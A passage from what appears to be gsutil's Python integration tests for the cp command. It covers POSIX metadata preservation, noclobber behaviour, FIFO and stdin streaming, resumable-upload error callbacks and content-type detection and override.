# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Integration tests for cp command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import ast
import base64
import binascii
import datetime
import gzip
import hashlib
import logging
import os
import pickle
import pkgutil
import random
import re
import stat
import string
import sys
import threading
from apitools.base.py import exceptions as apitools_exceptions
import boto
from boto import storage_uri
from boto.exception import ResumableTransferDisposition
from boto.exception import StorageResponseError
from boto.storage_uri import BucketStorageUri
from gslib.cloud_api import ResumableUploadStartOverException
from gslib.commands.config import DEFAULT_SLICED_OBJECT_DOWNLOAD_THRESHOLD
from gslib.cs_api_map import ApiSelector
from gslib.daisy_chain_wrapper import _DEFAULT_DOWNLOAD_CHUNK_SIZE
from gslib.discard_messages_queue import DiscardMessagesQueue
from gslib.gcs_json_api import GcsJsonApi
from gslib.parallel_tracker_file import ObjectFromTracker
from gslib.parallel_tracker_file import WriteParallelUploadTrackerFile
from gslib.project_id import PopulateProjectId
from gslib.storage_url import StorageUrlFromString
from gslib.tests.rewrite_helper import EnsureRewriteResumeCallbackHandler
from gslib.tests.rewrite_helper import HaltingRewriteCallbackHandler
from gslib.tests.rewrite_helper import RewriteHaltException
import gslib.tests.testcase as testcase
from gslib.tests.testcase.base import NotParallelizable
from gslib.tests.testcase.integration_testcase import SkipForGS
from gslib.tests.testcase.integration_testcase import SkipForS3
from gslib.tests.testcase.integration_testcase import SkipForXML
from gslib.tests.testcase.integration_testcase import SkipForJSON
from gslib.tests.util import BuildErrorRegex
from gslib.tests.util import GenerationFromURI as urigen
from gslib.tests.util import HaltingCopyCallbackHandler
from gslib.tests.util import HaltOneComponentCopyCallbackHandler
from gslib.tests.util import HAS_GS_PORT
from gslib.tests.util import HAS_S3_CREDS
from gslib.tests.util import ObjectToURI as suri
from gslib.tests.util import ORPHANED_FILE
from gslib.tests.util import POSIX_GID_ERROR
from gslib.tests.util import POSIX_INSUFFICIENT_ACCESS_ERROR
from gslib.tests.util import POSIX_MODE_ERROR
from gslib.tests.util import POSIX_UID_ERROR
from gslib.tests.util import SequentialAndParallelTransfer
from gslib.tests.util import SetBotoConfigForTest
from gslib.tests.util import TailSet
from gslib.tests.util import TEST_ENCRYPTION_KEY1
from gslib.tests.util import TEST_ENCRYPTION_KEY1_SHA256_B64
from gslib.tests.util import TEST_ENCRYPTION_KEY2
from gslib.tests.util import TEST_ENCRYPTION_KEY3
from gslib.tests.util import unittest
from gslib.third_party.storage_apitools import storage_v1_messages as apitools_messages
from gslib.tracker_file import DeleteTrackerFile
from gslib.tracker_file import GetRewriteTrackerFilePath
from gslib.tracker_file import GetSlicedDownloadTrackerFilePaths
from gslib.ui_controller import BytesToFixedWidthString
from gslib.utils import hashing_helper
from gslib.utils.boto_util import UsingCrcmodExtension
from gslib.utils.constants import START_CALLBACK_PER_BYTES
from gslib.utils.constants import UTF8
from gslib.utils.copy_helper import GetTrackerFilePath
from gslib.utils.copy_helper import PARALLEL_UPLOAD_STATIC_SALT
from gslib.utils.copy_helper import PARALLEL_UPLOAD_TEMP_NAMESPACE
from gslib.utils.copy_helper import TrackerFileType
from gslib.utils.hashing_helper import CalculateB64EncodedMd5FromContents
from gslib.utils.hashing_helper import CalculateMd5FromContents
from gslib.utils.posix_util import GID_ATTR
from gslib.utils.posix_util import MODE_ATTR
from gslib.utils.posix_util import NA_ID
from gslib.utils.posix_util import NA_MODE
from gslib.utils.posix_util import UID_ATTR
from gslib.utils.posix_util import ValidateFilePermissionAccess
from gslib.utils.posix_util import ValidatePOSIXMode
from gslib.utils.retry_util import Retry
from gslib.utils.system_util import IS_WINDOWS
from gslib.utils.text_util import get_random_ascii_chars
from gslib.utils.unit_util import EIGHT_MIB
from gslib.utils.unit_util import HumanReadableToBytes
from gslib.utils.unit_util import MakeHumanReadable
from gslib.utils.unit_util import ONE_KIB
from gslib.utils.unit_util import ONE_MIB
import six
from six.moves import http_client
from six.moves import range
from six.moves import xrange
if six.PY3:
long = int # pylint: disable=redefined-builtin,invalid-name
# These POSIX-specific variables aren't defined for Windows.
# pylint: disable=g-import-not-at-top
if not IS_WINDOWS:
from gslib.tests import util
from gslib.tests.util import DEFAULT_MODE
from gslib.tests.util import GetInvalidGid
from gslib.tests.util import GetNonPrimaryGid
from gslib.tests.util import GetPrimaryGid
from gslib.tests.util import INVALID_UID
from gslib.tests.util import USER_ID
# pylint: enable=g-import-not-at-top
def TestCpMvPOSIXBucketToLocalErrors(cls, bucket_uri, obj, tmpdir, is_cp=True):
"""Helper function for preserve_posix_errors tests in test_cp and test_mv.
Args:
cls: An instance of either TestCp or TestMv.
bucket_uri: The uri of the bucket that the object is in.
obj: The object to run the tests on.
tmpdir: The local file path to cp to.
is_cp: Whether or not the calling test suite is cp or mv.
"""
error = 'error'
# A dict of test_name: attrs_dict.
# attrs_dict holds the different attributes that we want for the object in a
# specific test.
# To minimize potential test flakes from the system's GID mapping changing
# mid-test, we use the GID-related methods that fetch GID info each time,
# rather than reusing the LazyWrapper-wrapped constants across operations.
test_params = {
'test1': {
MODE_ATTR: '333',
error: POSIX_MODE_ERROR
},
'test2': {
GID_ATTR: GetInvalidGid,
error: POSIX_GID_ERROR
},
'test3': {
GID_ATTR: GetInvalidGid,
MODE_ATTR: '420',
error: POSIX_GID_ERROR
},
'test4': {
UID_ATTR: INVALID_UID,
error: POSIX_UID_ERROR
},
'test5': {
UID_ATTR: INVALID_UID,
MODE_ATTR: '530',
error: POSIX_UID_ERROR
},
'test6': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetInvalidGid,
error: POSIX_UID_ERROR
},
'test7': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetInvalidGid,
MODE_ATTR: '640',
error: POSIX_UID_ERROR
},
'test8': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetPrimaryGid,
error: POSIX_UID_ERROR
},
'test9': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetNonPrimaryGid,
error: POSIX_UID_ERROR
},
'test10': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetPrimaryGid,
MODE_ATTR: '640',
error: POSIX_UID_ERROR
},
'test11': {
UID_ATTR: INVALID_UID,
GID_ATTR: GetNonPrimaryGid,
MODE_ATTR: '640',
error: POSIX_UID_ERROR
},
'test12': {
UID_ATTR: USER_ID,
GID_ATTR: GetInvalidGid,
error: POSIX_GID_ERROR
},
'test13': {
UID_ATTR: USER_ID,
GID_ATTR: GetInvalidGid,
MODE_ATTR: '640',
error: POSIX_GID_ERROR
},
'test14': {
GID_ATTR: GetPrimaryGid,
MODE_ATTR: '240',
error: POSIX_INSUFFICIENT_ACCESS_ERROR
}
}
# The first variable below can be used to help debug the test if there is a
# problem.
for test_name, attrs_dict in six.iteritems(test_params):
cls.ClearPOSIXMetadata(obj)
# Attributes default to None if they are not in attrs_dict; some attrs are
# functions or LazyWrapper objects that should be called.
uid = attrs_dict.get(UID_ATTR)
if uid is not None and callable(uid):
uid = uid()
gid = attrs_dict.get(GID_ATTR)
if gid is not None and callable(gid):
gid = gid()
mode = attrs_dict.get(MODE_ATTR)
cls.SetPOSIXMetadata(cls.default_provider,
bucket_uri.bucket_name,
obj.object_name,
uid=uid,
gid=gid,
mode=mode)
stderr = cls.RunGsUtil([
'cp' if is_cp else 'mv', '-P',
suri(bucket_uri, obj.object_name), tmpdir
],
expected_status=1,
return_stderr=True)
cls.assertIn(
ORPHANED_FILE, stderr,
'Error during test "%s": %s not found in stderr:\n%s' %
(test_name, ORPHANED_FILE, stderr))
error_regex = BuildErrorRegex(obj, attrs_dict.get(error))
cls.assertTrue(
error_regex.search(stderr),
'Test %s did not match expected error; could not find a match for '
'%s\n\nin stderr:\n%s' % (test_name, error_regex.pattern, stderr))
listing1 = TailSet(suri(bucket_uri), cls.FlatListBucket(bucket_uri))
listing2 = TailSet(tmpdir, cls.FlatListDir(tmpdir))
# Bucket should have un-altered content.
cls.assertEquals(listing1, set(['/%s' % obj.object_name]))
# Dir should have un-altered content.
cls.assertEquals(listing2, set(['']))
def TestCpMvPOSIXBucketToLocalNoErrors(cls, bucket_uri, tmpdir, is_cp=True):
"""Helper function for preserve_posix_no_errors tests in test_cp and test_mv.
Args:
cls: An instance of either TestCp or TestMv.
bucket_uri: The uri of the bucket that the object is in.
tmpdir: The local file path to cp to.
is_cp: Whether or not the calling test suite is cp or mv.
"""
primary_gid = os.stat(tmpdir).st_gid
non_primary_gid = util.GetNonPrimaryGid()
test_params = {
'obj1': {
GID_ATTR: primary_gid
},
'obj2': {
GID_ATTR: non_primary_gid
},
'obj3': {
GID_ATTR: primary_gid,
MODE_ATTR: '440'
},
'obj4': {
GID_ATTR: non_primary_gid,
MODE_ATTR: '444'
},
'obj5': {
UID_ATTR: USER_ID
},
'obj6': {
UID_ATTR: USER_ID,
MODE_ATTR: '420'
},
'obj7': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid
},
'obj8': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid
},
'obj9': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid,
MODE_ATTR: '433'
},
'obj10': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid,
MODE_ATTR: '442'
}
}
for obj_name, attrs_dict in six.iteritems(test_params):
uid = attrs_dict.get(UID_ATTR)
gid = attrs_dict.get(GID_ATTR)
mode = attrs_dict.get(MODE_ATTR)
cls.CreateObject(bucket_uri=bucket_uri,
object_name=obj_name,
contents=obj_name.encode(UTF8),
uid=uid,
gid=gid,
mode=mode)
for obj_name in six.iterkeys(test_params):
# Move objects one at a time to avoid listing consistency.
cls.RunGsUtil(
['cp' if is_cp else 'mv', '-P',
suri(bucket_uri, obj_name), tmpdir])
listing = TailSet(tmpdir, cls.FlatListDir(tmpdir))
cls.assertEquals(
listing,
set([
'/obj1', '/obj2', '/obj3', '/obj4', '/obj5', '/obj6', '/obj7',
'/obj8', '/obj9', '/obj10'
]))
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj1'),
gid=primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj2'),
gid=non_primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj3'),
gid=primary_gid,
mode=0o440)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj4'),
gid=non_primary_gid,
mode=0o444)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj5'),
uid=USER_ID,
gid=primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj6'),
uid=USER_ID,
gid=primary_gid,
mode=0o420)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj7'),
uid=USER_ID,
gid=primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj8'),
uid=USER_ID,
gid=non_primary_gid,
mode=DEFAULT_MODE)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj9'),
uid=USER_ID,
gid=primary_gid,
mode=0o433)
cls.VerifyLocalPOSIXPermissions(os.path.join(tmpdir, 'obj10'),
uid=USER_ID,
gid=non_primary_gid,
mode=0o442)
def TestCpMvPOSIXLocalToBucketNoErrors(cls, bucket_uri, is_cp=True):
"""Helper function for testing local to bucket POSIX preservation.
Args:
cls: An instance of either TestCp or TestMv.
bucket_uri: The uri of the bucket to cp/mv to.
is_cp: Whether or not the calling test suite is cp or mv.
"""
primary_gid = os.getgid()
non_primary_gid = util.GetNonPrimaryGid()
test_params = {
'obj1': {
GID_ATTR: primary_gid
},
'obj2': {
GID_ATTR: non_primary_gid
},
'obj3': {
GID_ATTR: primary_gid,
MODE_ATTR: '440'
},
'obj4': {
GID_ATTR: non_primary_gid,
MODE_ATTR: '444'
},
'obj5': {
UID_ATTR: USER_ID
},
'obj6': {
UID_ATTR: USER_ID,
MODE_ATTR: '420'
},
'obj7': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid
},
'obj8': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid
},
'obj9': {
UID_ATTR: USER_ID,
GID_ATTR: primary_gid,
MODE_ATTR: '433'
},
'obj10': {
UID_ATTR: USER_ID,
GID_ATTR: non_primary_gid,
MODE_ATTR: '442'
}
}
for obj_name, attrs_dict in six.iteritems(test_params):
uid = attrs_dict.get(UID_ATTR, NA_ID)
gid = attrs_dict.get(GID_ATTR, NA_ID)
mode = attrs_dict.get(MODE_ATTR, NA_MODE)
if mode != NA_MODE:
ValidatePOSIXMode(int(mode, 8))
ValidateFilePermissionAccess(obj_name,
uid=uid,
gid=int(gid),
mode=int(mode))
fpath = cls.CreateTempFile(contents=b'foo', uid=uid, gid=gid, mode=mode)
cls.RunGsUtil(
['cp' if is_cp else 'mv', '-P', fpath,
suri(bucket_uri, obj_name)])
if uid != NA_ID:
cls.VerifyObjectCustomAttribute(bucket_uri.bucket_name, obj_name,
UID_ATTR, str(uid))
if gid != NA_ID:
cls.VerifyObjectCustomAttribute(bucket_uri.bucket_name, obj_name,
GID_ATTR, str(gid))
if mode != NA_MODE:
cls.VerifyObjectCustomAttribute(bucket_uri.bucket_name, obj_name,
MODE_ATTR, str(mode))
def _ReadContentsFromFifo(fifo_path, list_for_output):
with open(fifo_path, 'rb') as f:
list_for_output.append(f.read())
def _WriteContentsToFifo(contents, fifo_path):
with open(fifo_path, 'wb') as f:
f.write(contents)
class _JSONForceHTTPErrorCopyCallbackHandler(object):
"""Test callback handler that raises an arbitrary HTTP error exception."""
def __init__(self, startover_at_byte, http_error_num):
self._startover_at_byte = startover_at_byte
self._http_error_num = http_error_num
self.started_over_once = False
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, total_size):
"""Forcibly exits if the transfer has passed the halting point."""
if (total_bytes_transferred >= self._startover_at_byte and
not self.started_over_once):
sys.stderr.write('Forcing HTTP error %s after byte %s. '
'%s/%s transferred.\r\n' %
(self._http_error_num, self._startover_at_byte,
MakeHumanReadable(total_bytes_transferred),
MakeHumanReadable(total_size)))
self.started_over_once = True
raise apitools_exceptions.HttpError({'status': self._http_error_num},
None, None)
class _XMLResumableUploadStartOverCopyCallbackHandler(object):
"""Test callback handler that raises start-over exception during upload."""
def __init__(self, startover_at_byte):
self._startover_at_byte = startover_at_byte
self.started_over_once = False
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, total_size):
"""Forcibly exits if the transfer has passed the halting point."""
if (total_bytes_transferred >= self._startover_at_byte and
not self.started_over_once):
sys.stderr.write(
'Forcing ResumableUpload start over error after byte %s. '
'%s/%s transferred.\r\n' %
(self._startover_at_byte, MakeHumanReadable(total_bytes_transferred),
MakeHumanReadable(total_size)))
self.started_over_once = True
raise boto.exception.ResumableUploadException(
'Forcing upload start over', ResumableTransferDisposition.START_OVER)
class _DeleteBucketThenStartOverCopyCallbackHandler(object):
"""Test callback handler that deletes bucket then raises start-over."""
def __init__(self, startover_at_byte, bucket_uri):
self._startover_at_byte = startover_at_byte
self._bucket_uri = bucket_uri
self.started_over_once = False
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, total_size):
"""Forcibly exits if the transfer has passed the halting point."""
if (total_bytes_transferred >= self._startover_at_byte and
not self.started_over_once):
sys.stderr.write('Deleting bucket (%s)' % (self._bucket_uri.bucket_name))
@Retry(StorageResponseError, tries=5, timeout_secs=1)
def DeleteBucket():
bucket_list = list(self._bucket_uri.list_bucket(all_versions=True))
for k in bucket_list:
self._bucket_uri.get_bucket().delete_key(k.name,
version_id=k.version_id)
self._bucket_uri.delete_bucket()
DeleteBucket()
sys.stderr.write(
'Forcing ResumableUpload start over error after byte %s. '
'%s/%s transferred.\r\n' %
(self._startover_at_byte, MakeHumanReadable(total_bytes_transferred),
MakeHumanReadable(total_size)))
self.started_over_once = True
raise ResumableUploadStartOverException('Artificially forcing start-over')
class _ResumableUploadRetryHandler(object):
"""Test callback handler for causing retries during a resumable transfer."""
def __init__(self,
retry_at_byte,
exception_to_raise,
exc_args,
num_retries=1):
self._retry_at_byte = retry_at_byte
self._exception_to_raise = exception_to_raise
self._exception_args = exc_args
self._num_retries = num_retries
self._retries_made = 0
# pylint: disable=invalid-name
def call(self, total_bytes_transferred, unused_total_size):
"""Cause a single retry at the retry point."""
if (total_bytes_transferred >= self._retry_at_byte and
self._retries_made < self._num_retries):
self._retries_made += 1
raise self._exception_to_raise(*self._exception_args)
class TestCp(testcase.GsUtilIntegrationTestCase):
"""Integration tests for cp command."""
# For tests that artificially halt, we need to ensure at least one callback
# occurs.
halt_size = START_CALLBACK_PER_BYTES * 2
def _get_test_file(self, name):
contents = pkgutil.get_data('gslib', 'tests/test_data/%s' % name)
return self.CreateTempFile(file_name=name, contents=contents)
def _CpWithFifoViaGsUtilAndAppendOutputToList(self, src_path_tuple, dst_path,
list_for_return_value,
**kwargs):
arg_list = ['cp']
arg_list.extend(src_path_tuple)
arg_list.append(dst_path)
# Append stderr, stdout, or return status (if specified in kwargs) to the
# given list.
list_for_return_value.append(self.RunGsUtil(arg_list, **kwargs))
@SequentialAndParallelTransfer
def test_noclobber(self):
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'bar')
stderr = self.RunGsUtil(
['cp', '-n', fpath, suri(key_uri)], return_stderr=True)
self.assertIn('Skipping existing item: %s' % suri(key_uri), stderr)
self.assertEqual(key_uri.get_contents_as_string(), b'foo')
stderr = self.RunGsUtil(['cp', '-n', suri(key_uri), fpath],
return_stderr=True)
with open(fpath, 'rb') as f:
self.assertIn('Skipping existing item: %s' % suri(f), stderr)
self.assertEqual(f.read(), b'bar')
@SequentialAndParallelTransfer
def test_noclobber_different_size(self):
key_uri = self.CreateObject(contents=b'foo')
fpath = self.CreateTempFile(contents=b'quux')
stderr = self.RunGsUtil(
['cp', '-n', fpath, suri(key_uri)], return_stderr=True)
self.assertIn('Skipping existing item: %s' % suri(key_uri), stderr)
self.assertEqual(key_uri.get_contents_as_string(), b'foo')
stderr = self.RunGsUtil(['cp', '-n', suri(key_uri), fpath],
return_stderr=True)
with open(fpath, 'rb') as f:
self.assertIn('Skipping existing item: %s' % suri(f), stderr)
self.assertEqual(f.read(), b'quux')
def test_dest_bucket_not_exist(self):
fpath = self.CreateTempFile(contents=b'foo')
invalid_bucket_uri = ('%s://%s' %
(self.default_provider, self.nonexistent_bucket_name))
# TODO(b/135780661): Remove retry after bug resolved
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
stderr = self.RunGsUtil(['cp', fpath, invalid_bucket_uri],
expected_status=1,
return_stderr=True)
self.assertIn('does not exist', stderr)
_Check()
def test_copy_in_cloud_noclobber(self):
bucket1_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
stderr = self.RunGsUtil(
['cp', suri(key_uri), suri(bucket2_uri)], return_stderr=True)
# Rewrite API may output an additional 'Copying' progress notification.
self.assertGreaterEqual(stderr.count('Copying'), 1)
self.assertLessEqual(stderr.count('Copying'), 2)
stderr = self.RunGsUtil(
['cp', '-n', suri(key_uri),
suri(bucket2_uri)], return_stderr=True)
self.assertIn(
'Skipping existing item: %s' % suri(bucket2_uri, key_uri.object_name),
stderr)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_cp_from_local_file_to_fifo(self):
contents = b'bar'
fifo_path = self.CreateTempFifo()
file_path = self.CreateTempFile(contents=contents)
list_for_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((file_path,), fifo_path, []))
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip(), contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_cp_from_one_object_to_fifo(self):
fifo_path = self.CreateTempFifo()
bucket_uri = self.CreateBucket()
contents = b'bar'
obj_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents)
list_for_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((suri(obj_uri),), fifo_path, []))
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip(), contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_cp_from_multiple_objects_to_fifo(self):
fifo_path = self.CreateTempFifo()
bucket_uri = self.CreateBucket()
contents1 = b'foo and bar'
contents2 = b'baz and qux'
obj1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents1)
obj2_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents2)
list_for_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((suri(obj1_uri), suri(obj2_uri)), fifo_path, []))
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertIn(contents1, list_for_output[0])
self.assertIn(contents2, list_for_output[0])
@SequentialAndParallelTransfer
def test_streaming(self):
bucket_uri = self.CreateBucket()
stderr = self.RunGsUtil(
['cp', '-', '%s' % suri(bucket_uri, 'foo')],
stdin='bar',
return_stderr=True)
self.assertIn('Copying from <STDIN>', stderr)
key_uri = self.StorageUriCloneReplaceName(bucket_uri, 'foo')
self.assertEqual(key_uri.get_contents_as_string(), b'bar')
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_streaming_from_fifo_to_object(self):
bucket_uri = self.CreateBucket()
fifo_path = self.CreateTempFifo()
object_name = 'foo'
object_contents = b'bar'
list_for_output = []
# Start writer in the background, which won't finish until a corresponding
# read operation is performed on the fifo.
write_thread = threading.Thread(target=_WriteContentsToFifo,
args=(object_contents, fifo_path))
write_thread.start()
# The fifo requires both a pending read and write before either operation
# will complete. Regardless of which operation occurs first, the
# corresponding subsequent operation will unblock the first one.
# We run gsutil in a thread so that it can timeout rather than hang forever
# if the write thread fails.
read_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((fifo_path,), suri(bucket_uri, object_name), list_for_output),
kwargs={'return_stderr': True})
read_thread.start()
read_thread.join(120)
write_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertIn('Copying from named pipe', list_for_output[0])
key_uri = self.StorageUriCloneReplaceName(bucket_uri, object_name)
self.assertEqual(key_uri.get_contents_as_string(), object_contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_streaming_from_fifo_to_stdout(self):
fifo_path = self.CreateTempFifo()
contents = b'bar'
list_for_output = []
write_thread = threading.Thread(target=_WriteContentsToFifo,
args=(contents, fifo_path))
write_thread.start()
read_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((fifo_path,), '-', list_for_output),
kwargs={'return_stdout': True})
read_thread.start()
read_thread.join(120)
write_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip().encode('ascii'), contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_streaming_from_stdout_to_fifo(self):
fifo_path = self.CreateTempFifo()
contents = b'bar'
list_for_output = []
list_for_gsutil_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=(('-',), fifo_path, list_for_gsutil_output),
kwargs={
'return_stderr': True,
'stdin': contents
})
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip(), contents)
def test_streaming_multiple_arguments(self):
bucket_uri = self.CreateBucket()
stderr = self.RunGsUtil(['cp', '-', '-', suri(bucket_uri)],
stdin='bar',
return_stderr=True,
expected_status=1)
self.assertIn('Multiple URL strings are not supported with streaming',
stderr)
# TODO: Implement a way to test both with and without using magic file.
@SequentialAndParallelTransfer
def test_detect_content_type(self):
"""Tests local detection of content type."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
self.RunGsUtil(['cp', self._get_test_file('test.mp3'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
if IS_WINDOWS:
self.assertTrue(
re.search(r'Content-Type:\s+audio/x-mpg', stdout) or
re.search(r'Content-Type:\s+audio/mpeg', stdout))
else:
self.assertRegex(stdout, r'Content-Type:\s+audio/mpeg')
_Check1()
self.RunGsUtil(['cp', self._get_test_file('test.gif'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check2()
def test_content_type_override_default(self):
"""Tests overriding content type with the default value."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
self.RunGsUtil(
['-h', 'Content-Type:', 'cp',
self._get_test_file('test.mp3'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+application/octet-stream')
_Check1()
self.RunGsUtil(
['-h', 'Content-Type:', 'cp',
self._get_test_file('test.gif'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+application/octet-stream')
_Check2()
def test_content_type_override(self):
"""Tests overriding content type with a value."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
self.RunGsUtil([
'-h', 'Content-Type:text/plain', 'cp',
self._get_test_file('test.mp3'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+text/plain')
_Check1()
self.RunGsUtil([
'-h', 'Content-Type:text/plain', 'cp',
self._get_test_file('test.gif'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+text/plain')
_Check2()
@unittest.skipIf(IS_WINDOWS, 'magicfile is not available on Windows.')
@SequentialAndParallelTransfer
def test_magicfile_override(self):
"""Tests content type override with magicfile value."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
fpath = self.CreateTempFile(contents=b'foo/bar\n')
self.RunGsUtil(['cp', fpath, dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
use_magicfile = boto.config.getbool('GSUtil', 'use_magicfile', False)
content_type = ('text/plain'
if use_magicfile else 'application/octet-stream')
self.assertRegex(stdout, r'Content-Type:\s+%s' % content_type)
_Check1()
@SequentialAndParallelTransfer
def test_content_type_mismatches(self):
"""Tests overriding content type when it does not match the file type."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
fpath = self.CreateTempFile(contents=b'foo/bar\n')
self.RunGsUtil([
'-h', 'Content-Type:image/gif', 'cp',
self._get_test_file('test.mp3'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check1()
self.RunGsUtil([
'-h', 'Content-Type:image/gif', 'cp',
self._get_test_file('test.gif'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check2()
self.RunGsUtil(['-h', 'Content-Type:image/gif', 'cp', fpath, dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check3():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check3()
@SequentialAndParallelTransfer
def test_content_type_header_case_insensitive(self):
"""Tests that content type header is treated with case insensitivity."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
